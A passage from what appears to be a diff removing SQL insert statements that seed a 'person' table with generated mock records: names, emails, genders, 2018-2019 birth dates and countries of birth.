'irevill88@pen.io', 'Female', '10/10/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Northrup', 'Nation', 'nnation89@ning.com', 'Male', '11/8/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Traver', 'Symones', 'tsymones8a@sciencedirect.com', 'Male', '9/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Anny', 'Boord', 'aboord8b@sciencedirect.com', 'Female', '10/31/2019', 'South Korea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Christophorus', 'Yeowell', 'cyeowell8c@delicious.com', 'Male', '3/7/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tate', 'Philipeaux', 'tphilipeaux8d@icio.us', 'Male', '8/10/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nerissa', 'Yakunin', null, 'Female', '2/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Melania', 'Gasnell', 'mgasnell8f@a8.net', 'Female', '8/2/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Olga', 'Dillet', 'odillet8g@pen.io', 'Female', '7/8/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Silvie', 'Reinhart', 'sreinhart8h@time.com', 'Female', '5/22/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Leigh', 'Swaile', 'lswaile8i@hp.com', 'Female', '2/15/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berni', 'Sheerin', null, 'Female', '4/25/2019', 'Eritrea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nanette', 'Lodeke', 'nlodeke8k@slideshare.net', 'Female', '10/7/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Papagena', 'Boays', 'pboays8l@ucoz.com', 'Female', '3/5/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jayme', 'Rengger', 'jrengger8m@sitemeter.com', 'Female', '1/4/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marve', 'Espinas', null, 'Male', '5/16/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Renelle', 'Jordan', 'rjordan8o@nbcnews.com', 'Female', '3/11/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jayne', 'Larkings', 'jlarkings8p@geocities.com', 'Female', '1/10/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Herculie', 'Idale', 'hidale8q@hubpages.com', 'Male', '10/3/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jayme', 'Chevolleau', 'jchevolleau8r@is.gd', 'Female', '4/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aksel', 'Youster', null, 'Male', '3/18/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Davidde', 'Kleinberer', 'dkleinberer8t@wunderground.com', 'Male', '6/23/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Che', 'Fesby', 'cfesby8u@wufoo.com', 'Male', '8/21/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lian', 'Odams', null, 'Female', '6/18/2019', 'Yemen'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carley', 'Heintzsch', null, 'Female', '11/9/2019', 'Uganda'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zebadiah', 'Thoumas', 'zthoumas8x@spotify.com', 'Male', '5/1/2019', 'Luxembourg'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rick', 'Andrichak', 'randrichak8y@sfgate.com', 'Male', '5/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chloette', 'Lighterness', 'clighterness8z@oakley.com', 'Female', '1/19/2019', 'Egypt'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jeremiah', 'Luff', null, 'Male', '2/23/2019', 'Germany'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marylin', 'Blazhevich', null, 'Female', '11/23/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Obadias', 'Cokely', 'ocokely92@webmd.com', 'Male', '4/27/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rosalind', 'Niles', 'rniles93@tmall.com', 'Female', '11/5/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Humbert', 'Whenman', null, 'Male', '11/24/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Genvieve', 'Hurford', 'ghurford95@dyndns.org', 'Female', '2/19/2019', 'Palestinian Territory'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Paulita', 'Hadye', null, 'Female', '1/15/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Yule', 'Jeness', 'yjeness97@ucoz.ru', 'Male', '8/17/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Adamo', 'Bayston', null, 'Male', '8/11/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marijn', 'Josh', 'mjosh99@wsj.com', 'Male', '12/21/2018', 'Pakistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bondon', 'Peschke', 'bpeschke9a@dailymotion.com', 'Male', '2/1/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Harlin', 'Bausmann', 'hbausmann9b@noaa.gov', 'Male', '12/14/2018', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Padriac', 'Harries', 'pharries9c@aboutads.info', 'Male', '1/1/2019', 'Cameroon'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Terrell', 'Sulter', null, 'Male', '3/22/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ilyssa', 'Virgo', null, 'Female', '8/13/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marylinda', 'Cancutt', null, 'Female', '7/8/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Erwin', 'Jerred', 'ejerred9g@xinhuanet.com', 'Male', '3/6/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vasily', 'Thornborrow', 'vthornborrow9h@sohu.com', 'Male', '2/7/2019', 'Bosnia and Herzegovina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Helene', 'Parkes', null, 'Female', '7/22/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Patsy', 'Legonidec', null, 'Female', '10/23/2019', 'Mozambique'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Winnie', 'Manns', 'wmanns9k@ask.com', 'Male', '7/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marta', 'Vater', 'mvater9l@usa.gov', 'Female', '6/5/2019', 'Switzerland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bob', 'Bassham', 'bbassham9m@g.co', 'Male', '1/13/2019', 'El Salvador'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ambrosi', 'Broadis', 'abroadis9n@meetup.com', 'Male', '1/16/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nellie', 'Mitchard', null, 'Female', '4/21/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Constance', 'Squibbs', 'csquibbs9p@hc360.com', 'Female', '8/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Skye', 'Meeks', 'smeeks9q@yelp.com', 'Male', '8/14/2019', 'Netherlands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ruperta', 'Zanutti', null, 'Female', '8/30/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lotty', 'Crosse', 'lcrosse9s@usgs.gov', 'Female', '12/1/2018', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Darla', 'Grishukhin', 'dgrishukhin9t@yolasite.com', 'Female', '8/3/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jody', 'Huthart', null, 'Female', '3/29/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alvie', 'Liverseege', 'aliverseege9v@noaa.gov', 'Male', '5/3/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ddene', 'Salaman', null, 'Female', '9/14/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Robinia', 'Lamprecht', null, 'Female', '2/15/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marybelle', 'Giovannacc@i', null, 'Female', '10/20/2019', 'Malaysia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wright', 'Benham', 'wbenham9z@netlog.com', 'Male', '1/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Becki', 'Larver', 'blarvera0@oracle.com', 'Female', '1/18/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sheelagh', 'De Giorgis', 'sdegiorgisa1@wufoo.com', 'Female', '1/24/2019', 'Israel'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Huntlee', 'Straneo', 'hstraneoa2@feedburner.com', 'Male', '12/20/2018', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mildrid', 'Slowly', null, 'Female', '5/2/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Heinrik', 'Elvish', 'helvisha4@twitpic.com', 'Male', '3/15/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kassandra', 'Ellerker', 'kellerkera5@about.com', 'Female', '11/18/2019', 'United Kingdom'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marketa', 'Posse', 'mpossea6@jugem.jp', 'Female', '2/18/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Averil', 'Perrigo', 'aperrigoa7@cyberchimps.com', 'Female', '9/1/2019', 'Guatemala'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dare', 'Pidgin', 'dpidgina8@123-reg.co.uk', 'Male', '6/24/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dwayne', 'Ainley', 'dainleya9@prweb.com', 'Male', '10/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Read', 'Castaner', 'rcastaneraa@ovh.net', 'Male', '6/8/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Boyce', 'Siebart', 'bsiebartab@abc.net.au', 'Male', '2/19/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jacquelyn', 'Arkley', null, 'Female', '4/12/2019', 'Bulgaria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rupert', 'Dickon', null, 'Male', '7/21/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hetti', 'Greystock', null, 'Female', '3/2/2019', 'Switzerland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Merrilee', 'Fishburn', null, 'Female', '5/28/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Isis', 'Beckson', 'ibecksonag@oakley.com', 'Female', '4/24/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fidel', 'Drei', 'fdreiah@howstuffworks.com', 'Male', '5/27/2019', 'Comoros'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Farra', 'Bills', null, 'Female', '1/20/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Frants', 'Henkens', 'fhenkensaj@bbc.co.uk', 'Male', '4/24/2019', 'Palestinian Territory'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kalila', 'Janek', 'kjanekak@vk.com', 'Female', '1/9/2019', 'Ivory Coast'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Keane', 'Zuanazzi', 'kzuanazzial@addtoany.com', 'Male', '2/9/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bertie', 'Craven', 'bcravenam@cam.ac.uk', 'Male', '12/31/2018', 'Togo'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Borden', 'Dentith', 'bdentithan@1688.com', 'Male', '4/26/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pavla', 'Pellew', 'ppellewao@weather.com', 'Female', '8/11/2019', 'Kazakhstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ralph', 'Armour', null, 'Male', '10/30/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pavlov', 'Cattonnet', null, 'Male', '11/10/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wittie', 'Jepperson', null, 'Male', '10/29/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sybilla', 'Menego', 'smenegoas@jigsy.com', 'Female', '12/12/2018', 'Saudi Arabia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kean', 'D''eye', null, 'Male', '8/24/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Salvidor', 'Toolin', null, 'Male', '12/28/2018', 'Guatemala'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Minne', 'Ellif', 'mellifav@upenn.edu', 'Female', '6/28/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Duff', 'Sprulls', null, 'Male', '8/12/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ainsley', 'Caesar', null, 'Female', '3/6/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Anthea', 'Bouldstridge', 'abouldstridgeay@nifty.com', 'Female', '8/26/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ian', 'Ewols', 'iewolsaz@123-reg.co.uk', 'Male', '1/1/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Padriac', 'Dampney', null, 'Male', '10/27/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marsh', 'Alcorn', null, 'Male', '12/18/2018', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hali', 'Steven', 'hstevenb2@rediff.com', 'Female', '9/22/2019', 'Angola'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Abrahan', 'Ablett', 'aablettb3@google.ca', 'Male', '8/3/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alexandra', 'Sayle', 'asayleb4@liveinternet.ru', 'Female', '7/8/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Noella', 'Tulloch', null, 'Female', '1/4/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Adolphus', 'Wellfare', null, 'Male', '12/21/2018', 'Tuvalu'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Randi', 'Abbitt', 'rabbittb7@list-manage.com', 'Male', '10/8/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marcy', 'Edmunds', 'medmundsb8@desdev.cn', 'Female', '5/17/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Damon', 'Reihm', 'dreihmb9@rakuten.co.jp', 'Male', '3/6/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bettye', 'Dominka', 'bdominkaba@icio.us', 'Female', '1/29/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Corene', 'Holyard', 'cholyardbb@ucla.edu', 'Female', '1/8/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giovanna', 'Waplinton', 'gwaplintonbc@ebay.com', 'Female', '2/26/2019', 'Kenya'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tudor', 'Ethington', 'tethingtonbd@weebly.com', 'Male', '8/6/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Loreen', 'Farrier', 'lfarrierbe@reddit.com', 'Female', '7/28/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lyle', 'McKenny', 'lmckennybf@hugedomains.com', 'Male', '2/27/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jeanne', 'Ricardin', 'jricardinbg@smh.com.au', 'Female', '5/11/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stacee', 'Lambotin', null, 'Female', '3/20/2019', 'Nepal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chiquia', 'Proppers', 'cproppersbi@freewebs.com', 'Female', '12/1/2018', 'Norway'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Krishnah', 'Fagence', 'kfagencebj@soup.io', 'Male', '4/4/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dominik', 'Leeds', 'dleedsbk@yelp.com', 'Male', '10/4/2019', 'Lithuania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pavia', 'Swigger', 'pswiggerbl@skyrock.com', 'Female', '5/28/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lamar', 'Heakins', 'lheakinsbm@google.com.au', 'Male', '8/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fidel', 'Patington', 'fpatingtonbn@feedburner.com', 'Male', '2/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Olympe', 'Baddeley', null, 'Female', '12/5/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marci', 'Giovannelli', null, 'Female', '9/30/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Meredith', 'Deschelle', 'mdeschellebq@macromedia.com', 'Male', '9/22/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Linoel', 'Carnegie', 'lcarnegiebr@shutterfly.com', 'Male', '2/24/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lyndsie', 'Mulqueeny', 'lmulqueenybs@java.com', 'Female', '7/12/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zarah', 'Trower', 'ztrowerbt@goodreads.com', 'Female', '4/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chryste', 'Lownsbrough', 'clownsbroughbu@nih.gov', 'Female', '10/2/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sherlocke', 'Lutwidge', 'slutwidgebv@smugmug.com', 'Male', '2/8/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Donal', 'Zavattieri', null, 'Male', '2/3/2019', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gavrielle', 'Coy', 'gcoybx@discovery.com', 'Female', '7/31/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Arluene', 'Boole', 'abooleby@dot.gov', 'Female', '10/25/2019', 'Bangladesh'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bibi', 'Manon', 'bmanonbz@tamu.edu', 'Female', '8/8/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gino', 'Caltun', 'gcaltunc0@ebay.com', 'Male', '6/14/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giffy', 'Liggett', 'gliggettc1@businesswire.com', 'Male', '11/28/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Goober', 'Free', null, 'Male', '1/26/2019', 'Comoros'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Angus', 'Arkin', 'aarkinc3@nasa.gov', 'Male', '10/29/2019', 'Mozambique'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gottfried', 'Cleverly', 'gcleverlyc4@trellian.com', 'Male', '9/20/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Corey', 'Hendricks', 'chendricksc5@tmall.com', 'Male', '12/27/2018', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wallache', 'O''Fallowne', 'wofallownec6@slashdot.org', 'Male', '5/26/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Becki', 'Ebi', null, 'Female', '9/18/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Joice', 'Stokes', 'jstokesc8@multiply.com', 'Female', '9/13/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ida', 'MacDearmont', 'imacdearmontc9@4shared.com', 'Female', '5/3/2019', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Margit', 'Lithcow', 'mlithcowca@marriott.com', 'Female', '2/3/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Georgi', 'Mougin', 'gmougincb@imgur.com', 'Male', '10/26/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dudley', 'Imison', 'dimisoncc@fotki.com', 'Male', '3/26/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Opal', 'Christy', 'ochristycd@histats.com', 'Female', '3/2/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vite', 'Meriet', 'vmerietce@wiley.com', 'Male', '10/24/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alden', 'Jiru', null, 'Male', '5/23/2019', 'Turkmenistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dedie', 'Prescote', null, 'Female', '9/19/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Evangelina', 'O''Bruen', 'eobruench@deliciousdays.com', 'Female', '9/20/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Renell', 'Scandwright', null, 'Female', '11/11/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Madella', 'Ca', 'mcacj@scientificamerican.com', 'Female', '1/19/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berty', 'Strugnell', 'bstrugnellck@omniture.com', 'Male', '6/20/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rosalind', 'Watkinson', 'rwatkinsoncl@cam.ac.uk', 'Female', '1/29/2019', 'Costa Rica'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bryon', 'Laverty', 'blavertycm@addthis.com', 'Male', '10/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Albertine', 'Edmonson', 'aedmonsoncn@illinois.edu', 'Female', '4/26/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pearline', 'Christall', 'pchristallco@buzzfeed.com', 'Female', '5/24/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caroline', 'Pennoni', null, 'Female', '8/13/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dall', 'Guillain', 'dguillaincq@dailymotion.com', 'Male', '10/20/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Flossy', 'Joris', null, 'Female', '9/21/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marilee', 'Votier', 'mvotiercs@ustream.tv', 'Female', '8/10/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gertrudis', 'Blick', null, 'Female', '8/8/2019', 'Yemen'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dirk', 'Surman', 'dsurmancu@deviantart.com', 'Male', '8/4/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clark', 'Loxly', null, 'Male', '5/30/2019', 'Bolivia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marley', 'Vernham', null, 'Female', '3/25/2019', 'Iran'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Barrett', 'Clothier', 'bclothiercx@biglobe.ne.jp', 'Male', '7/21/2019', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mal', 'Gosnoll', 'mgosnollcy@oracle.com', 'Male', '9/25/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brook', 'Nelligan', 'bnelligancz@ihg.com', 'Male', '5/23/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Avivah', 'Girardy', 'agirardyd0@youku.com', 'Female', '8/23/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alessandro', 'Taffee', 'ataffeed1@dedecms.com', 'Male', '4/16/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Enrika', 'Warlock', 'ewarlockd2@howstuffworks.com', 'Female', '1/1/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pearline', 'Vaughton', 'pvaughtond3@shinystat.com', 'Female', '7/28/2019', 'Australia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cherri', 'Fossitt', 'cfossittd4@ed.gov', 'Female', '8/1/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nickie', 'Baillie', null, 'Female', '11/14/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rikki', 'Karlolak', 'rkarlolakd6@friendfeed.com', 'Female', '4/6/2019', 'Bosnia and Herzegovina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Frederica', 'Crummy', 'fcrummyd7@desdev.cn', 'Female', '12/31/2018', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aldo', 'Sherrell', 'asherrelld8@answers.com', 'Male', '10/5/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Grantley', 'Gillicuddy', 'ggillicuddyd9@cisco.com', 'Male', '8/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Glenna', 'Gambell', 'ggambellda@reference.com', 'Female', '4/19/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mandi', 'Simonds', 'msimondsdb@cnet.com', 'Female', '5/30/2019', 'East Timor'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Randall', 'Aggett', 'raggettdc@tripadvisor.com', 'Male', '8/1/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zeke', 'Skaife', null, 'Male', '7/16/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, 